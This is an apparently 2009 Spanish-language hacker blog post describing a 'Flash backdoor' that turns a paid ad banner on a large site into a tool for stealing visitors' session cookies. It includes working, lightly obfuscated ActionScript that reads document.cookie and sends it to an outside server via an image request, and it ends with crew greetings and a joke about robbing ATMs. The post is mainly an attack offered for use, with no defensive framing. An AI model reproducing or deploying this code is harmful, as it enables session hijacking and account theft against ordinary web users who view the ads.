FLASH BACKDOOR XSS

Backdoor Flash, Hay cientos de ejemplos del cómo usar esta rata negra.

Por citar una idea:

Grandes sitios en internet como periódicos o comunidades de redes sociales ofrecen publicar tus anuncios por algo así como 10 USD mensuales etc., Bien dados sus límites de publicidad te pedirán un banner en flash o una imagen.

Hoy en día hay muy buenos cryptos para flash, y con una leve bypasseada podemos embeber javascript para el robo de sesiones de una manera muy silenciosa.

Simple banner

Banner Infected

Acá un demo de un banner infectado Flash Backdoor demo

actionscript

Mt_1="get";
Mt_2="URL";
Mt_3="javascript:";
Mt_4="c00k13=document.cookie;";
Mt_4+="i=document.createElement('IMG');";
Mt_4+="i.setAttribute('src', 'http://malandrines.net/Advisory/FLASH-BACKDOOR/0Wnz.php?c='+c00k13);";
Mt_5="alert('n350k, Malandrines.net :'+c00k13);void(0);";
eval(Mt_1+Mt_2)(Mt_3+Mt_4+Mt_5);

Saludos al Uknowz por el fucking Sound track, y al blackRusian por la buena charla, "Roben ATM los viernes porque tienen más dinero para aguantar el fin de semana jajaja"

aaa y Os cuento un chiste señores xD XD XD Pwned Xpermin

Writing by: n350k Date: 2009-12-13 02:10:00
Gr33tz: ukn0wz, w3r0x, bikolinux, 50ck0, Poison.san, Xp3rm4, g4b0, z3r0-zo0rg(Gay), b3n0x and Mafia boys CreW, Dios De La Red, Fatal error
Fucking White hat's

Rola este r00t: